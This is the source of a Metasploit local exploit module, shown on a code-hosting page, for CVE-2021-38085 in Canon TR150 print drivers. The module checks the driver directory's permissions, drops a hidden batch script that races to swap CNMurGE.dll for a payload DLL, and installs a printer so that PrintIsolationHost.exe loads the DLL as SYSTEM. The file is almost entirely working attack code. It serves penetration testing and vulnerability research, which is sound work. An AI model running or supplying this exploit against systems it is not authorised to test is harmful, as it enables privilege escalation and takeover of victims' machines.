Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/local/canon_driver_privesc.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = NormalRanking78include Msf::Post::File9include Msf::Exploit::EXE10include Msf::Post::Windows::Priv11include Msf::Exploit::FileDropper12prepend Msf::Exploit::Remote::AutoCheck1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'Canon Driver Privilege Escalation',19'Description' => %q{20Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files21within the "CanonBJ" directory and its subdirectories. By overwriting the DLL at22C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C\CNMurGE.dll23with a malicious DLL at the right time whilst running the C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs24script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,25which runs as NT AUTHORITY\SYSTEM, to successfully load the malicious DLL. Successful exploitation26will grant attackers code execution as the NT AUTHORITY\SYSTEM user.2728This module leverages the prnmngr.vbs script29to add and delete printers. Multiple runs of this30module may be required given successful exploitation31is time-sensitive.32},33'License' => MSF_LICENSE,34'Author' => [35'Jacob Baines', # discovery, PoC, module36'Shelby Pace' # original Ricoh module37],38'References' => [39['CVE', '2021-38085'],40],41'Arch' => [ ARCH_X86, ARCH_X64 ],42'Platform' => 'win',43'SessionTypes' => [ 'meterpreter' ],44'Targets' => [45[46'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }47]48],49'Notes' => {50'SideEffects' => [ ARTIFACTS_ON_DISK ],51'Reliability' => [ UNRELIABLE_SESSION ],52'Stability' => [ SERVICE_RESOURCE_LOSS ]53},54'DisclosureDate' => '2021-08-07',55'DefaultTarget' => 0,56'Compat' => {57'Meterpreter' => {58'Commands' => %w[59stdapi_sys_process_execute60]61}62}63)64)6566self.needs_cleanup = true67end6869def check70@driver_path = ''71dir_name = 'C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series'7273return CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name)7475language_dirs = dir(dir_name)7677return CheckCode::Detected("Detected Canon driver directory, but no language files. Its likely the driver is installed but a printer hasn't been added yet") unless language_dirs.length7879@driver_path = dir_name80@driver_path.concat('\\LanguageModules\\040C')81res = cmd_exec("icacls \"#{@driver_path}\"")82vulnerable = res.match(/\\Users:(?:\(I\))?\(OI\)\(CI\)\(F\)/)8384return CheckCode::Safe("#{@driver_path} directory does not exist or does not grant Users full permissions") unless vulnerable8586vprint_status("Vulnerable language driver directory: #{@driver_path}")87CheckCode::Appears('Canon language driver directory grants Users full permissions')88end8990def add_printer(driver_name)91fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)9293dll_data = generate_payload_dll94dll_path = "#{@driver_path}\\CNMurGE.dll"9596temp_path = expand_path('%TEMP%\\CNMurGE.dll')9798bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")99cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""100101# this script monitors the target dll for modification and then copies102# over our malicious dll. As this is a time based attack, it won't103# always be succuessful!104bat_file = <<~HEREDOC105attrib -a "#{dll_path}"106:repeat107for %%i in ("#{dll_path}") do echo %%~ai | find "a" >nul || goto :repeat108timeout /t 1109#{cp_cmd}110attrib -a "#{dll_path}"111HEREDOC112113print_status("Dropping batch script to #{bat_file_path}")114write_file(bat_file_path, bat_file)115116print_status("Writing DLL file to #{temp_path}")117write_file(temp_path, dll_data)118register_files_for_cleanup(bat_file_path, temp_path)119120script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""121bat_cmd = "cmd.exe /c \"#{bat_file_path}\""122vprint_status('Executing the batch script...')123client.sys.process.execute(bat_cmd, nil, { 'Hidden' => true })124125print_status("Adding printer #{@printer_name}...")126cmd_exec(script_cmd)127rescue Rex::Post::Meterpreter::RequestError => e128fail_with(Failure::Unknown, "#{e.class} #{e.message}")129end130131def exploit132fail_with(Failure::None, 'Already running as SYSTEM') if is_system?133134fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'135136if sysinfo['Architecture'] != payload.arch.first137fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target machine')138end139140@printer_name = Rex::Text.rand_text_alpha(5..9)141@script_path = 'C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs'142drvr_name = 'Canon TR150 series'143144add_printer(drvr_name)145end146147def cleanup148print_status("Deleting printer #{@printer_name}")149sleep(3)150delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""151client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })152end153end154155156